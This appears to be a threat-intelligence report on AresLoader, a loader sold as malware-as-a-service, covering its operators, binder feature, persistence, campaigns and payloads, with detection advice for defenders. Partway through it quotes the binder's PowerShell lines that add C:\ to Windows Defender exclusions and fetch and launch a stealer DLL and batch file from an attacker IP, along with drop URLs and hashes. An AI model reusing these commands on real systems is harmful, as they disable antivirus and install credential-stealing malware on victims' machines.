AresLoader is a new loader malware-as-a-service (MaaS) offered by threat actors with links to Russian hacktivism that was spotted recently in the wild. Most users are pushing a variety of information stealers with the service. The service offers a “binder” tool that allows users to masquerade their malware as legitimate software.

We would like to acknowledge Roberto Martinez and Taisiia Garkava for alerting us to their in-the-wild observations of AresLoader and sharing their observations with us.

The actors behind the loader

In late November 2022, a threat actor using the handle AiD Lock aka DarkBLUP announced a new MaaS program called AresLoader on Telegram. The actor subsequently announced the service on the popular underground forums RAMP and XSS. The actor claimed the malware loader was written in the C programming language and allegedly is undetectable by Windows Defender antivirus software.

Previously our cyber intelligence team had associated AiD Lock with PHANTOM DEV aka Dead X Inject, and the DeadXInject Hack group, along with also offering the AiD Locker ransomware-as-a-service (RaaS) program.

The hacktivism - cybercrime crossover continues

The group we associated AiD Lock with, PHANTOM DEV, engaged in hacktivist activities in mid-2022 and claimed affiliation with the Red Hackers Alliance Russia aka RHA, RHA R pro-Russian hacktivist group. Evidence suggests multiple members of this group are either users or administrators of the AresLoader MaaS. This trend is not surprising and something that is being seen more frequently from hacktivist groups, who usually focus on distributed denial-of-service (DDoS) attacks. However, the shift in tactics, techniques and procedures (TTPs) of these groups to align more closely with cybercriminals, while supporting nation-state political objectives, continues to be observed more frequently.

AresLoader - Malware-as-a-service breakdown

The AresLoader MaaS costs US $300 per month and includes five builds that allegedly are “packed manually.” The AresLoader panel offers an optional binder service in which a legitimate file is merged with the malicious loader.

The idea is that the malicious payload can masquerade as a legitimate file, often an installer for popular software.

The binder works by writing a stub launcher that will launch the original legitimate executable, then write a batch (.bat) file to disk and execute that .bat file with “cmd.exe.”

The .bat file contains three PowerShell commands that perform three tasks:

1. Add “C:\” to the Windows Defender exclusion paths via:

Add-MpPreference -ExclusionPath ('C:\\')

2. Fetch the malicious payload from a remote URL and execute it via:

WGet (http://5.75.248[.]207/emsabp32.dll) -OutfilE $EnV:AlLuSErSpRoFiLe\\emsabp32.dll;

StARt-proCEss $EnV:aLluseRspROFiLE\\emsabp32.dll

In this case, a Raccoon Stealer payload with the 24de09bb454b0318af20ffcc21c6dd4ad5d6627cab7d7bfcb5c2278f63a2c3b7 SHA-256.

3. The third PowerShell command fetches and launches a .bat file that uses rundll32.exe to execute the target payload — emsabp32.dll in this case.

Wget (http[:]//5.75.248[.]207/rundll32.bat) -oUtFIle $env:aLluSerSPROfIle\\rundll32.bat; sTArT-proCESS $EnV:aLluSErsPRoFILE\\rundll32.bat

.bat file - start rundll32.exe emsabp32.dll, _Start@1

Malware behavior

AresLoader has basic download and execute capabilities. Upon execution, it checks if it is running as an administrator. If not, it attempts to escalate its privileges using the ShellExecuteA application programming interface (API) and “runas” command.

To remain persistent, it sets a scheduled task and also adds a key to the “\HKCU\Software\Microsoft\Windows\CurrentVersion\Run\” registry key.

Distribution methods

Campaign one — SystemBC, Amadey direct install

Intel 471 first observed AresLoader in the wild Jan. 26, 2023. It was dropped by SystemBC (C2: 89.22.225[.]242) and later by the Amadey version 3.50 controller (C2: 85.209.135[.]109), both times fetched from the same drop location — the http[:]//5.75.248[.]207/loader.exe link.

In addition to the AresLoader sample, the Laplas clipper was installed from the same IP address that day. The threat actors first tried to install this payload directly following the infection chain:

SystemBC download and execute command a follow-up payload from the URL:

• http[:]//5.75.248[.]207/avicapn32.exe

Laplas clipper (Golang variant) downloaded sample SHA-256 from the URL above:

• 7cffcc27c8ab249e6e669274dd40d5ad138daa7f71548a5dfbb4b112db1053e2

They then shipped a second payload — a lightly obfuscated PowerShell script to download and fetch the above Laplas sample — from the URL http[:]//5.75.248[.]207/cmpbksrvc32.cmd.

The threat actor made a feeble attempt to bypass security measures by installing the same payload via a different method.

We tracked this AresLoader customer by monitoring the behavior of the SystemBC and Amadey botnets they control. We observed the actor operating the loader in this instance likes to drop information-stealer malware, primarily Laplas, on victim machines and subsequently cryptocurrency miner payloads.

Campaign two — Using AresLoader binder service

A similar campaign to push AresLoader was discovered by malware researchers Roberto Martinez and Taisiia Garkava. In this case, several Raccoon Stealer samples were found dropping AresLoader. This AresLoader sample (40003d01db9c34da73a415792dba3a617fab65e91d2aae7bbbcd335af198a66b) dropped StealC and SystemBC payloads. The Raccoon Stealer payload was masquerading as an installer for a legitimate application called Revo Uninstaller Pro. The threat actor likely used the binder service available through the AresLoader control panel.

The aforementioned .bat file that calls the payload with rundll32.exe sheds additional light on the use of the AresLoader binder feature. The VirusTotal intelligence platform shows parent payloads of the .bat file that all masquerade as common freeware.

Payloads

Not many instances of AresLoader have been discovered in the wild at present, but the loader MaaS does appear to have a few “customers.” Payloads Intel 471 and other researchers have observed thus far include:

• SystemBC – A back door and socket secure internet protocol (SOCKS) proxy tunnel.

• Lumma Stealer – A popular stealer MaaS.

• StealC – A new stealer MaaS that offers a configurable targeting system.

• Aurora Stealer – A stealer MaaS written in the Golang programming language.

• Laplas clipper – A cryptocurrency clipper written in .NET and Golang.

Hosting

The AresLoader command and control (C2) infrastructure has been hosted at virtual private server (VPS) providers in Germany, the Netherlands and Russia.

Intel 471 recommendations

We recommend defenders evaluate the following suggested measures for implementation in their environments:

• Flag scheduled tasks added via .bat or .cmd files.

• Turn on PowerShell logging.

• Flag changes to Defender exception list via “Add-MpPreference -ExclusionPath.”

• Enforce evaluation of code signing for .exe files and MSI installers to detect tampering.

MITRE ATT&CK® techniques

This report uses the MITRE ATT&CK® aka Adversarial Tactics, Techniques and Common Knowledge framework.

Indicators